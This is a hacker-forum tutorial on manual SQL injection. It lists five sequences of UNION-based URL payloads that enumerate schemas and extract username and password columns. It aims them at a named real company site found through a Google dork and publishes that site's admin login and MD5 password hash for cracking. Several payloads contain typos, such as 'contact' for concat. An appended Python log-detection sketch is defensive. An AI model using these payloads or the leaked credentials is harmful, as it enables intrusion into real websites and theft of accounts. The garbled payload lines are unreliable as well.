- Greetings... In this video I have shown manual SQL injection on a site, along with one simple, short method... A new method is out for you: 5 ways of going the manual route. If you have any questions, go ahead! Respect the effort + Enjoy!
- [youtube]SQXrwxg2-Es[/youtube]
- Source[Volume1]:
- [code]SQL Injection Manual Volume 1
- From start to finish:
- http://site.com/index.php?id=50
- http://site.com/index.php?id='50
- http://site.com/index.php?id=50 order by 52--
- http://site.com/index.php?id=-50 union all select 1,2,3,4,5,6,7,8,9,10,11--
- http://site.com/index.php?id=-50 union all select 1,2,version(),4,5,6,7,8,9,10,11--
- http://site.com/index.php?id=-50 union all select 1,2,table_name,4,5,6,7,8,9,10,11 FROM information_schema.tables--
- http://site.com/index.php?id=-50 union all select 1,2,column_name,4,5,6,7,8,9,10,11 FROM information_schema.column--
- http://site.com/index.php?id=-50 union all select 1,2,schema_name,4,5,6,7,8,9,10,11 FROM information_schema.schemata--
- http://site.com/index.php?id=-50 union all select 1,2,contact(username,0x3,password),4,5,6,7,8,9,10,11 FROM database_name.table_name--
- ++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++
- Volume 1 :
- The number of columns I found:
- # Number of the Columns : 15
- # Useful : 2
- # Version : 5.0.77
- # Table Name : _user
- # Columns Name : username , password
- # Result : 0
- # This way for this site : NO USEFUL!
- This method did not work for this site; now let's try Volume 2 [but it does work on versions above 5...][/code]
- Source[Volume2]:
- [code]SQL Injection Manual Volume 2
- From start to finish:
- http://site.com/index.php?id=5
- http://site.com/index.php?id='5
- http://site.com/index.php?id=5 order by 10--
- http://site.com/index.php?id=-5 union select 1,2,3,4,5,6,7--
- http://site.com/index.php?id=-5 union select 1,2,@@version,3,4,5,6,7--
- http://site.com/index.php?id=-5 union select 1,2,group_concat(table_name),4,5,6,7 from information_schema.tables where table_schema=database()
- Google : Text to hex converter
- Site: http://swingnote.com/tools/texttohex.php
- http://site.com/index.php?id=-5 union select 1,2,group_concat(column_name),4,5,6,7 from information_schema.columns where table_name=0xHex(the hex of the table name)
- http://site.com/index.php?id=-5 union select 1,2,group_concat(columnuser,0x3a,columnpass),4,5,6,7 from table
- Dork : Text to Hex Converter
- Volume 2:
- # Version : 5.0.77
- # Table Name : _user
- # Encode Table Name : 5f75736572
- # Useful : NOT
- So this did not work on this version...[/code]
- Source[Volume3]:
- [code]SQL Injection Manual Volume 3
- From start to finish:
- http://site.com/index.php?id=5
- http://site.com/index.php?id='5
- http://site.com/index.php?id=5 order by 1--
- http://site.com/index.php?id=-5 union all select 1,2,3,4,5--
- http://site.com/index.php?id=-5 union all select 1,2,table_name,4,5 FROM information_schema.tables limit 2,1--
- http://site.com/index.php?id=-5 union all select 1,2,table_name,4,5 FROM information_schema.tables limit 10,1--
- http://site.com/index.php?id=-5 union all select 1,2,table_name,4,5 FROM information_schema.tables limit 20,1--
- http://site.com/index.php?id=-5 union all select 1,2,column_name,4,5 FROM information_schema.columns where(table_name=0xHex)limit 1,1--
- http://site.com/index.php?id=-5 union all select 1,2,group_concat(admin,0x3a,password),4,5 FROM admin--
- # Hex Encode Site : http://mikezilla.com/exp0012.html
- Volume 3 :
- # 5F75736572
- # Columns - Username , password
- # Bingo :D Found it, this method works... Now let's look at the 4th method...
- [/code]
- Source[Volume4]:
- [code]SQL Injection Manual Volume 4
- From start to finish:
- http://site.com/index.php?id=5
- http://site.com/index.php?id='5
- http://site.com/index.php?id=5 order by 1--
- http://site.com/index.php?id=-5 union all select 1,2,3,4,5--
- http://site.com/index.php?id=-5 union all select 1,2,table_name,4,5 FROM information_schema.tables--
- http://site.com/index.php?id=-5 union all select 1,2,column_name,4,5 FROM information_schema.columns where table_name=Char(char code)
- http://site.com/index.php?id=-5 union all select 1,2,concat(admin,0x3a,password),4,5 FROM admin--
- Dork : Convert to ASCII
- Volume 4 :
- # The essentials have been found... now let's repeat our work...
- # And Bingo again :D
- # And now let's try another simple method, the easiest one...[/code]
- Source:
- [code]++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++
- # Date : 2012:04:25
- # Subject : SQL injection Manual Volume 1+2+3+4 With [Target Site]
- # Author : Avatar [Fearless]
- # Dork : inurl:product.php?id=1
- # Target Site : www.bcspeakers.com/product.php?id=1
- # Software : Anti-armenia.ORG // Pirates-Crew.ORG // Pwn.Me :D
- # Team'Z : AA Team // PC Team // PWN Team :D // The Fear // UG Team
- # Language : Azerbaijani Language
- # Location : Sweden/Sundsvall
- # Greet'Z to : All member'z of the Team'Z
- # Respect to : All my Bro'Z!
- ++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++
- Let's Start :
- Greetings... Up to today [today included] I have shown you 4 ways/methods of manual SQL injection, in 4 volumes, and today we will test all of them on 1 site...
- I tested it, perfect, but only the 1st one; now I am testing the others together with you, so watch carefully and understand... so these are our dork and our
- site.... first of all I am starting with the 1st method
- [/code]
- Source[Volume5]:
- [code]++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++
- # Date : 2012:04:25
- # Subject : SQL injection Manual Volume 5
- # Author : Avatar [Fearless]
- # Dork : inurl:product.php?id=1
- # Target Site : www.bcspeakers.com/product.php?id=1
- # Software : Anti-armenia.ORG // Pirates-Crew.ORG // Pwn.Me :D
- # Team'Z : AA Team // PC Team // PWN Team :D // The Fear // UG Team
- # Language : Azerbaijani Language
- # Location : Sweden/Sundsvall
- # Greet'Z to : All member'z of the Team'Z
- # Respect to : All my Bro'Z!
- ++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++
- Let's Start:
- Watch...
- # Table Name : _user
- # Columns Name'z : username , password
- # Pass+Login : becspeak2803:286adae502ad9d5ab8c4f8644050b448
- # And Bingo again :D this is another method... and a simple one... now let's continue
- # And now go look for a program / site that will crack this. Thanks for watching. Video by Avatar Fearless
- thank'Z For Watching... Bye ![/code]
- From start to finish:
- [code]http://site.com/index.php?id=5
- http://site.com/index.php?id='5
- http://site.com/index.php?id=5 order by 10--
- http://site.com/index.php?id=-5 union all select 1,2,3,4,5--
- http://site.com/index.php?id=-5 union all select 1,@@version,3,4,5--
- http://site.com/index.php?id=-5 union all select 1,table_name,3,4,5 from information_schema.tables--
- http://site.com/index.php?id=-5 union all select 1,column_name,3,4,5 from information_schema.columns--
- http://site.com/index.php?id=-5 union all select 1,group_concat(username,0x3a,password)3,4,5 from _user
- [/code]
- Site Login + Pass:
- [code]# Login : becspeak2803
- # Password : [Nothing]
- # Password[MD5] : 286adae502ad9d5ab8c4f8644050b448
- # Target Site : www.bcspeakers.com/
- # Dork : inurl:product.php?id=1
- # Open : www.bcspeakers.com/product.php?id=1
- # Admin Panel : [Not Found][/code]
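
For defenders: the request sequence in the post (quote probe, ORDER BY column count, UNION SELECT, information_schema enumeration, hex or CHAR() encoded names, concat extraction) leaves a recognisable trail in web access logs. The following detection sketch is an added example, not part of the original post; the stage names, threshold, log lines, addresses and paths are all constructed for illustration.

```python
import re
from urllib.parse import urlsplit, parse_qsl

# Stages of the request sequence listed in the post, matched against the
# URL-decoded parameter value. Patterns are illustrative, not exhaustive.
STAGES = [
    ("quote_probe", re.compile(r"^'|'$")),
    ("column_count", re.compile(r"\border\s+by\s+\d+", re.I)),
    ("union_select", re.compile(r"\bunion\s+(all\s+)?select\b", re.I)),
    ("schema_enum", re.compile(r"\binformation_schema\.", re.I)),
    ("encoded_name", re.compile(r"\b0x[0-9a-f]{2,}\b|\bchar\s*\(", re.I)),
    ("concat_dump", re.compile(r"\b(group_)?concat\s*\(", re.I)),
]
# Client address and request target from a combined-format access log line.
LOG_RE = re.compile(r'^(\S+) \S+ \S+ \[[^\]]+\] "(?:GET|POST) (\S+) ')

def stages_in_request(target):
    """Return the stage names matched by any query parameter value."""
    hits = set()
    for _name, value in parse_qsl(urlsplit(target).query, keep_blank_values=True):
        hits.update(stage for stage, rx in STAGES if rx.search(value))
    return hits

def suspicious_clients(lines, min_stages=3):
    """Map client address -> sorted stages, for clients reaching min_stages."""
    seen = {}
    for line in lines:
        m = LOG_RE.match(line)
        if m:
            seen.setdefault(m.group(1), set()).update(stages_in_request(m.group(2)))
    return {ip: sorted(s) for ip, s in seen.items() if len(s) >= min_stages}

# Constructed sample log: documentation address ranges, hypothetical paths.
TS = "[25/Apr/2012:10:00:00 +0000]"
SAMPLE_LOG = [
    f'203.0.113.7 - - {TS} "GET /index.php?id=5 HTTP/1.1" 200 5120',
    f'203.0.113.7 - - {TS} "GET /index.php?id=%275 HTTP/1.1" 500 312',
    f'203.0.113.7 - - {TS} "GET /index.php?id=5%20order%20by%2010-- HTTP/1.1" 200 5120',
    f'203.0.113.7 - - {TS} "GET /index.php?id=-5%20union%20all%20select%201,2,3,4,5-- HTTP/1.1" 200 4096',
    f'203.0.113.7 - - {TS} "GET /index.php?id=-5%20union%20all%20select%201,table_name,3,4,5'
    f'%20from%20information_schema.tables-- HTTP/1.1" 200 9000',
    f'198.51.100.20 - - {TS} "GET /index.php?id=12 HTTP/1.1" 200 5120',
    f'198.51.100.20 - - {TS} "GET /search.php?q=trade%20union%20history HTTP/1.1" 200 2048',
]

if __name__ == "__main__":
    for ip, stages in suspicious_clients(SAMPLE_LOG).items():
        print(ip, stages)
```

Counting distinct stages per client, rather than alerting on a single keyword, keeps ordinary search text such as "trade union history" from triggering while still catching the stepwise progression shown above.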